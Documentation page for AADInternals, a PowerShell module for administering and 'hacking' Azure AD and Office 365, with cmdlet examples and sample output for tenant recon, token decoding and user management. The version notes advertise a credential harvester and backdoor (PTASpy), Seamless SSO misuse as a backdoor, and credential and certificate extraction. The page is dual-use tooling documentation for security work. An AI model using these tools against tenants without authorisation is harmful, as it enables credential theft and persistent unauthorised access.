AAD Internals

Introduction

AADInternals PowerShell module contains tools for administering and hacking Azure AD and Office 365.

Installation

The module can be installed from PowerShell:

# Install the module
Install-Module AADInternals

# Import the module
Import-Module AADInternals

The module is also available in GitHub https://github.com/Gerenios/AADInternals and PowerShell Gallery.

About

AAD Internals is a PowerShell module where I’ve tried to put all the knowledge I’ve gained during the years spent with Office 365 and Azure AD. It is a result of hours of reverse-engineering and debugging of Microsoft tools related to Azure AD, such as PowerShell modules, directory synchronisation, and admin portals.

The module is a plain PowerShell script module, so you can copy and paste the code to your own scripts as needed. Having said that, the are some functions that are utilising the built-in functionality of Windows. Thus, everything might not work on every computer.

The module is now on early beta, so all comments and ideas are more than welcome. You can comment to this article or post bugs and fixes to GitHub.

I haven’t tried to duplicate all functionality MSOnline or AzureAD modules currently have. Instead, I decided to bring that information and functionality those modules doesn’t provide. Also, I have created some “blackhat” level functionality that allows administrators to do things that shouldn’t be even possible..

Detailed help about parameters etc. can be seen using PowerShell Get-Help cmdlet:

# See help for Get-AADIntAccessTokenForAADGraph
Get-Help Get-AADIntAccessTokenForAADGraph

Version info

Version Date Version notes
0.2.8 Mar 30th 2020 Added functionality for registering PTA Agents and configuring users’ MFA settings. Includes an experimental PTA Agent that emulates Azure AD pass-through authentication.
0.2.7 Dec 12th 2019 “Black Hat Europe edition”.
Added OneDrive for Business functions. Allows bypassing OneDrive (and SharePoint & Teams) domain restrictions.
0.2.6 Oct 30th 2019 “T2 infosec edition”.
Added Kerberos support. Allows getting Access Tokens using Kerberos tickets, and using Seamless Single-Sign-On as backdoor.
0.2.5 Aug 16th 2019 ADFS certificate export finally working! Bug fixes.
0.2.4 Aug 2nd 2019 “Black Hat edition”.
Added client, SPO, and SARA functions, several bug fixes.
0.2.3 May 29th 2019 Added functions to manipulate ADFS token signing certificates.
0.2.2 May 22nd 2019 Added PTASpy (pass-through authentication credential harvester and backdoor).
0.1.8 May 17th 2019 Added functions to extract and reset Azure AD Connect credentials.
0.1.7 May 10th 2019 Added Exchange Online and Outlook functionality + loads of other updates.
0.1.1 Oct 25th 2018 The first beta release.

Functionality

Playing with access tokens

Most of the functions are using REST APIs which require OAuth access tokens. The AADInternals module is using the following types of access tokens:

Token/API Function Remarks
AAD Graph Get-AADIntAccessTokenForAADGraph Functions using AAD Graph access token have a cache, so no need pass it as parameter every time. If credentials are not passed, will prompt for credentials (supports MFA).
MS Graph Get-AADIntAccessTokenForMSGraph Not used in this version.
Pass Through Authentication Get-AADIntAccessTokenForPTA Used when enabling/disabling PTA and Seamless SSO (Desktop SSO)
Azure Admin Portal Get-AADIntAuthTokenForAADIAMAPI Used when inviting guest users.
Exchange Online Get-AADIntAccessTokenForEXO Used with Exchange Online and ActiveSync functions
Support and Recovery Assistant Get-AADIntAccessTokenForSARA Used with Support and Recovery Assistant functions
SharePoint Online Get-AADIntSPOAuthenticationHeader Used with SharePoint Online functions
OneDrive for Business New-AADIntOneDriveSettings Used with OneDrive for Business functions

To get an AAD Graph access token and save it to cache, run the following function. The token will be valid for an hour, after that you need to run the function again.

# Prompt for credentials and retrieve & store access token to cache
Get-AADIntAccessTokenForAADGraph

Information Functions

Information functions are functions that can be used to retrieve information about users, tenants, and Office 365. Functions marked with * doesn’t need authentication. Functions marked with A uses AAD Graph access token.

Get-AADIntLoginInformation (*)

This function returns login information for the given user (or domain).

Example:

# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com

Output:

Federation Protocol                  : WSTrust
Pref Credential                      : 4
Consumer Domain                      : 
Cloud Instance audience urn          : urn:federation:MicrosoftOnline
Authentication Url                   : https://msft.sts.microsoft.com/adfs/ls/?username=nn%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=
Throttle Status                      : 1
Account Type                         : Federated
Has Password                         : True
Federation Active Authentication Url : https://msft.sts.microsoft.com/adfs/services/trust/2005/usernamemixed
Exists                               : 0
Federation Metadata Url              : https://msft.sts.microsoft.com/adfs/services/trust/mex
Desktop Sso Enabled                  : 
Tenant Banner Logo                   : 
Tenant Locale                        : 
Cloud Instance                       : microsoftonline.com
State                                : 3
Domain Type                          : 4
Domain Name                          : microsoft.com
Tenant Banner Illustration           : 
Federation Brand Name                : Microsoft
Federation Global Version            : -1
User State                           : 2

Get-AADIntEndpointInstances (*)

This function returns Office 365 instances and information when the latest changes have been made (e.g. ips & urls).

Example:

# Get Office 365 instances
Get-AADIntEndpointInstances 

Output:

instance     latest    
--------     ------    
Worldwide    2018100100
USGovDoD     2018100100
USGovGCCHigh 2018100100
China        2018100100
Germany      2018100100

Get-AADIntEndpointIps (*)

This function returns Office 365 ip addresses and urls for the given instance. The information can be used to create firewall rules.

Example:

# Get ips and urls for "normal" Office 365
Get-AADIntEndpointIps -Instance WorldWide

Output:

id                     : 1
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {outlook.office.com, outlook.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 80,443
expressRoute           : True
category               : Optimize
required               : True

id                     : 2
serviceArea            : Exchange
serviceAreaDisplayName : Exchange Online
urls                   : {smtp.office365.com}
ips                    : {13.107.6.152/31, 13.107.9.152/31, 13.107.18.10/31, 13.107.19.10/31...}
tcpPorts               : 587
expressRoute           : True
category               : Allow
required               : True

Get-AADIntTenantDetails (A)

This function returns details for the given tenant.

Example:

# Get tenant details
Get-AADIntTenantDetails

Output:

odata.type                           : Microsoft.DirectoryServices.TenantDetail
objectType                           : Company
objectId                             : e21e0e8c-d2ed-4edf-aa91-937963949cdc
deletionTimestamp                    : 
assignedPlans                        : ..
city                                 : 
companyLastDirSyncTime               : 2018-10-25T12:53:43Z
country                              : 
countryLetterCode                    : FI
dirSyncEnabled                       : True
displayName                          : Company Ltd
marketingNotificationEmails          : {}
postalCode                           : 
preferredLanguage                    : en
privacyProfile                       : 
provisionedPlans                     : ..
provisioningErrors                   : {}
securityComplianceNotificationMails  : {}
securityComplianceNotificationPhones : {}
state                                : 
street                               : 
technicalNotificationMails           : {user@alt.none}
telephoneNumber                      : 123456789
verifiedDomains                      : ..

Get-AADIntTenantID (*)

Since version 0.1.6
This function returns tenant id for the given user, domain, or Access Token.

Example:

# Get tenant ID
Get-AADIntTenantID -Domain microsoft.com

Output:

72f988bf-86f1-41af-91ab-2d7cd011db47

Get-AADIntOpenIDConfiguration (*)

Since version 0.1.6
This function returns the open ID configuration for the given user or domain.

Example:

# Get tenant ID
Get-AADIntOpenIDConfiguration -Domain microsoft.com

Output:

authorization_endpoint                : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
token_endpoint                        : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token
token_endpoint_auth_methods_supported : {client_secret_post, private_key_jwt, client_secret_basic}
jwks_uri                              : https://login.microsoftonline.com/common/discovery/keys
response_modes_supported              : {query, fragment, form_post}
subject_types_supported               : {pairwise}
id_token_signing_alg_values_supported : {RS256}
http_logout_supported                 : True
frontchannel_logout_supported         : True
end_session_endpoint                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/logout
response_types_supported              : {code, id_token, code id_token, token id_token...}
scopes_supported                      : {openid}
issuer                                : https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/
claims_supported                      : {sub, iss, cloud_instance_name, cloud_instance_host_name...}
microsoft_multi_refresh_token         : True
check_session_iframe                  : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/checksession
userinfo_endpoint                     : https://login.microsoftonline.com/72f988bf-86f1-41af-91ab-2d7cd011db47/openid/userinfo
tenant_region_scope                   : WW
cloud_instance_name                   : microsoftonline.com
cloud_graph_host_name                 : graph.windows.net
msgraph_host                          : graph.microsoft.com
rbac_url                              : https://pas.windows.net

Get-AADIntServiceLocations (A)

This function shows the tenant’s true service locations.

Example:

# Get service location information of the tenant
Get-AADIntServiceLocations | Format-Table

Output:

Region Instance             Name                          State Country
------ --------             ----                          ----- -------
EU     EU001                PowerBI                             IR     
EU     PROD_MSUB01_02       SCO                                 IE     
NA     NA001                MultiFactorService                  US     
NA     NA001                AzureAdvancedThreatAnalytics        US     
EU     Prod04               Adallom                             GB     
NA     NA001                AADPremiumService                   US     
EU     EURP191-001-01       exchange                            IE     
NA     NA003                YammerEnterprise                    US     
NA     NA001                To-Do                               US     
NA     NA001                TeamspaceAPI                        US     
NA     NA001                Sway                                US     
EU     SPOS1196             SharePoint                          NL     
EU     EU                   RMSOnline                           NL     
EU     PROD_EU_Org_Ring_152 ProjectWorkManagement               NL     
NA     NA001                ProcessSimple                       US     
NA     NA001                PowerAppsService                    US     
NA     NA001                OfficeForms                         US     
NA     NA001                MicrosoftStream                     US     
NA     NorthAmerica1        MicrosoftOffice                     US     
EU     EMEA-2E-S3           MicrosoftCommunicationsOnline       NL     
EU     emea05-01            ExchangeOnlineProtection            NL     
NA     NA001                Deskless                            US     
NA     NA002                SMIT                                US     
NA     NA001                Metro                               US     
EU     EU003                DirectoryToCosmos                   GB     
NA     *                    BecWSClients                        US     
NA     NA033                BDM                                 US     
EU     EUGB02               AadAllTenantsNotifications          GB

Get-AADIntServicePlans (A)

This function returns information about tenant’s service plans, such as name, id, status, and when first assigned.

Example:

# Get the service plans of the tenant
Get-AADIntServicePlans | Format-Table

Output:

SKU               ServicePlanId                        ServiceName           ServiceType                   AssignedTimestamp    CapabilityStatus ProvisioningStatus
---               -------------                        -----------           -----------                   -----------------    ---------------- ------------------
ENTERPRISEPREMIUM b1188c4c-1b36-4018-b48b-ee07604f6feb PAM_ENTERPRISE        Exchange                      2018-09-27T15:47:45Z Enabled          Success           
                  76846ad7-7776-4c40-a281-a386362dd1b9                       ProcessSimple                 2018-09-27T15:47:25Z Deleted                            
                  c87f142c-d1e9-4363-8630-aaea9c4d9ae5                       To-Do                         2018-09-27T15:47:24Z Deleted                            
                  c68f8d98-5534-41c8-bf36-22fa496fa792                       PowerAppsService              2018-09-27T15:47:25Z Deleted                            
                  9e700747-8b1d-45e5-ab8d-ef187ceec156                       MicrosoftStream               2018-09-27T15:47:25Z Deleted                            
                  2789c901-c14e-48ab-a76a-be334d9d793a                       OfficeForms                   2018-09-27T15:47:25Z Deleted                            
ENTERPRISEPREMIUM 9f431833-0334-42de-a7dc-70aa40db46db LOCKBOX_ENTERPRISE    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 3fb82609-8c27-4f7b-bd51-30634711ee67 BPOS_S_TODO_3         To-Do                         2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 7547a3fe-08ee-4ccb-b430-5077c5041653 YAMMER_ENTERPRISE     YammerEnterprise              2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8e0c0a52-6a6c-4d40-8370-dd62790dcd70 THREAT_INTELLIGENCE   Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 9c0dab89-a30c-4117-86e7-97bda240acd2 POWERAPPS_O365_P3     PowerAppsService              2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM b737dad2-2f6c-4c65-90e3-ca563267e8b9 PROJECTWORKMANAGEMENT ProjectWorkManagement         2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 5dbe027f-2339-4123-9542-606e4d348a72 SHAREPOINTENTERPRISE  SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c098270-9dd4-4350-9b30-ba4703f3b36b ADALLOM_S_O365        Adallom                       2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 6c6042f5-6f01-4d67-b8c1-eb99d36eed3e STREAM_O365_E5        MicrosoftStream               2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 07699545-9485-468e-95b6-2fca3738be01 FLOW_O365_P3          ProcessSimple                 2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4de31727-a228-4ec3-a5bf-8e45b5ca48cc EQUIVIO_ANALYTICS     Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 0feaeb32-d00e-4d66-bd5a-43b5b83db82c MCOSTANDARD           MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 70d33638-9c74-4d01-bfd3-562de28bd4ba BI_AZURE_P2           PowerBI                       2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 43de0ff5-c92c-492b-9116-175376d08c38 OFFICESUBSCRIPTION    MicrosoftOffice               2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 3e26ee1f-8a5f-4d52-aee2-b81ce45c8f40 MCOMEETADV            MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e95bec33-7c88-4a70-8e19-b10bd9d0c014 SHAREPOINTWAC         SharePoint                    2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 8c7d2df8-86f0-4902-b2ed-a0458298f3b3 Deskless              Deskless                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 57ff2da0-773e-42df-b2af-ffb7a2317929 TEAMS1                TeamspaceAPI                  2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM 4828c8ec-dc2e-4779-b502-87ac9ce28ab7 MCOEV                 MicrosoftCommunicationsOnline 2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM 34c0d7a0-a70f-4668-9238-47f9fc208882 EXCHANGE_ANALYTICS    Exchange                      2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM f20fedf3-f3c3-43c3-8267-2bfdd51c0939 ATP_ENTERPRISE        Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM efb87545-963c-4e0d-99df-69c6916d9eb0 EXCHANGE_S_ENTERPRISE Exchange                      2018-08-27T05:46:51Z Enabled          Success           
ENTERPRISEPREMIUM e212cbc7-0961-4c40-9825-01117710dcb1 FORMS_PLAN_E5         OfficeForms                   2018-08-27T05:46:50Z Enabled          Success           
ENTERPRISEPREMIUM a23b959c-7ce8-4e57-9140-b90eb88a9e97 SWAY                  Sway                          2018-08-27T05:46:51Z Enabled          Success           
EMSPREMIUM        113feb6c-3fe4-4440-bddc-54d774bf0318 EXCHANGE_S_FOUNDATION Exchange                      2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        eec0eb4f-6444-4f95-aba0-50c24d67f998 AAD_PREMIUM_P2        AADPremiumService             2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        c1ec4a95-1f05-45b3-a911-aa3fa01094f5 INTUNE_A              SCO                           2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2 ADALLOM_S_STANDALONE  Adallom                       2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        6c57d4b6-3b23-47a5-9bc9-69f17b4947b3 RMS_S_PREMIUM         RMSOnline                     2018-08-13T10:17:32Z Enabled          Success           
EMSPREMIUM        41781fb2-bc02-4b7c-bd55-b576c07bb09d AAD_PREMIUM           AADPremiumService             2018-08-13T10:17:34Z Enabled          Success           
EMSPREMIUM        14ab5db5-e6c4-4b20-b4bc-13e36fd2227f ATA                   AzureAdvancedThreatAnalytics  2018-08-13T10:17:31Z Enabled          Success           
EMSPREMIUM        8a256a2b-b617-496d-b51b-e76466e88db0 MFA_PREMIUM           MultiFactorService            2018-08-13T10:17:33Z Enabled          Success           
EMSPREMIUM        5689bec4-755d-4753-8b61-40975025187c RMS_S_PREMIUM2        RMSOnline                     2018-08-13T10:17:31Z Enabled          Success           
ENTERPRISEPREMIUM 882e1d05-acd1-4ccb-8708-6ee03664b117 INTUNE_O365           SCO                           2018-07-26T15:47:50Z Deleted          PendingActivation 
EMSPREMIUM        bea4c11e-220a-4e6d-8eb8-8ea15d019f90 RMS_S_ENTERPRISE      RMSOnline                     2018-06-26T10:47:37Z Enabled          Success

Get-AADIntSubscriptions (A)

This function returns tenant’s subscription details, such as name, id, number of licenses, and when created.

Example:

# Get subscriptions of the tenant
Get-AADIntSubscriptions

Output:

SkuPartNumber     WarningUnits TotalLicenses IsTrial NextLifecycleDate    OcpSubscriptionId                    ConsumedUnits ObjectId                             SkuId                                DateCreated         
-------------     ------------ ------------- ------- -----------------    -----------------                    ------------- --------                             -----                                -----------         
EMSPREMIUM        0            250           true    2018-11-13T00:00:00Z 76909010-12ed-4b05-b3d7-ee1b42c21b4e 21            58265dbe-24e0-4cdb-8b62-51197a4c1c13 b05e124f-c7cc-45a0-a6aa-8cf78c946968 2018-08-13T00:00:00Z
ENTERPRISEPREMIUM 25           25            true    2018-10-27T15:47:40Z 7c206b83-2487-49fa-b91e-3d676de02ccb 21            df58544b-5062-4d6c-85de-937f203bbe0f c7df2760-2c81-4ef7-b578-5b5392b571df 2018-08-27T00:00:00Z

Get-AADIntSPOServiceInformation (A)

This function returns details of tenant’s SharePoint Online instance, such as when created and last modified.

Example:

# Get SharePoint Online information
Get-AADIntSPOServiceInformation

Output: (sorted for clarity)

CreatedOn                               : 6/26/2018 11:16:12 AM
EnableOneDriveforSuiteUsers             : False
InstanceId                              : 44f5a625-f90e-4916-b8ab-ec45d38bdbb6
LastModifiedOn                          : 10/25/2018 7:37:38 AM
OfficeGraphUrl                          : https://company-my.sharepoint.com/_layouts/15/me.aspx
RootAdminUrl                            : https://company-admin.sharepoint.com/
RootIWSPOUrl                            : https://company-my.sharepoint.com/
SPO_LegacyPublicWebSiteEditPage         : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl        : 
SPO_LegacyPublicWebSiteUrl              : 
SPO_MySiteHostUrl                       : https://company-my.sharepoint.com/
SPO_MySiteHost_AboutMeUrl               : https://company-my.sharepoint.com/person.aspx
SPO_MySiteHost_DocumentsUrl             : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_NewsFeedUrl              : https://company-my.sharepoint.com/default.aspx
SPO_MySiteHost_ProjectSiteUrl           : https://company-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_MySiteHost_SitesUrl                 : https://company-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_PublicWebSitePublicUrl              : 
SPO_PublicWebSiteUrl                    : NotSupported
SPO_RegionalRootSiteUrl                 : https://company.sharepoint.com/
SPO_RootSiteUrl                         : https://company.sharepoint.com/
SPO_TenantAdminUrl                      : https://company-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://company-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ProjectAdminUrl         : https://company-admin.sharepoint.com/
SPO_TenantAdmin_ViewSiteCollectionsUrl  : https://company-admin.sharepoint.com/
SPO_TenantUpgradeUrl                    : https://company-admin.sharepoint.com/
ServiceInformation_LastChangeDate       : 10/25/2018 7:37:22 AM
ShowSites_InitialVisibility             : True
ShowSkyDrivePro_InitialVisibility       : True
ShowYammerNewsFeed_InitialVisibility    : True
VideoPortalServerRelativeUrl            : /portals/hub/_layouts/15/videohome.aspx

Get-AADIntCompanyInformation (A)

This function returns details about tenant’s company information. Pretty much same functionality than Get-MsolCompanyInformation cmdlet.

Example:

# Get company information of the tenant
Get-AADIntCompanyInformation

Output:

AllowAdHocSubscriptions                  : false
AllowEmailVerifiedUsers                  : false
AuthorizedServiceInstances               : AuthorizedServiceInstances
AuthorizedServices                       : 
City                                     : 
CompanyDeletionStartTime                 : 
CompanyTags                              : CompanyTags
CompanyType                              : CompanyTenant
CompassEnabled                           : 
Country                                  : 
CountryLetterCode                        : GB
DapEnabled                               : 
DefaultUsageLocation                     : 
DirSyncAnchorAttribute                   : 
DirSyncApplicationType                   : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DirSyncClientMachineName                 : SERVER2016
DirSyncClientVersion                     : 1.1.882.0
DirSyncServiceAccount                    : Sync_SERVER2016_acf4f37725ce@company.onmicrosoft.com
DirectorySynchronizationEnabled          : true
DirectorySynchronizationStatus           : Enabled
DisplayName                              : Company Ltd
InitialDomain                            : company.onmicrosoft.com
LastDirSyncTime                          : 2018-10-25T13:53:46Z
LastPasswordSyncTime                     : 2018-10-25T14:03:01Z
MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identity the status of certain changes, such as SharePoint version update.

Example:

# Get login information for a domain
Get-AADIntLoginInformation -Domain company.com

Output:

azure.microsoft.com/azure=active
o365.microsoft.com/startdate=635711754831829038
o365.microsoft.com/version=15
o365.microsoft.com/signupexperience=GeminiSignUpUI
o365.microsoft.com/14to15UpgradeScheduled=True
o365.microsoft.com/14to15UpgradeCompletedDate=04-16-2013

Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.

Example:

# Get login information for a domain
Get-AADIntSyncConfiguration

Output:

TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0

Get-AADIntTenantDomains (E)

Since version 0.1.6
This function returns all domains from the tenant of the given domain. The given user MUST have GlobalAdmin / CompanyAdministrator role in the tenant running the function, but no rights to the target tenant is needed. Works fine with trials tenants too..

Example:

# Get the access token
$at = Get-AADIntAccessTokenForEXO

# List domains from tenant where company.com is registered
Get-AADIntTenantDomains -AccessToken $at -Domain company.com

Output:

company.com
company.fi
company.co.uk
company.onmicrosoft.com
company.mail.onmicrosoft.com

Utilities

Utilities provide the functionality for troubleshooting and so.

Read-AADIntAccesstoken (*)

This function show access (and id and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss).

You can also show details from the token copied from the browser session’s authorization -header.

Example:

# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at

Output:

aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0

Get-AADIntCertificate (*)

This function loads certificate from a .pfx file to a variable. Used to create SAML tokens.

Example:

# Get login information for a domain
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'

Output:

Thumbprint                                Subject                                                                                                                                                                                                    
----------                                -------                                                                                                                                                                                                    
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns ImmutableId for the given ADUser -object. Must be run on a computer having ActiveDirectory -module

Example:

# Get ImmutableId for a ADUser
$user=Get-ADUser "myuser"
$immutableId=Get-AADIntImmutableID
$immutableId

Output:

Zjk1OGUxZTctNDE4ZS00Njk5LTg1ZjgtN2YyNGM2NTcwNW==

User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.

Example:

# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId

Output:

UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.

Example:

# Get user information
Get-AADIntUser 

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.

Example:

# Get login information for a domain
New-AADIntUser -UserPrincipalName "user@company.com" -DisplayName "New User"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
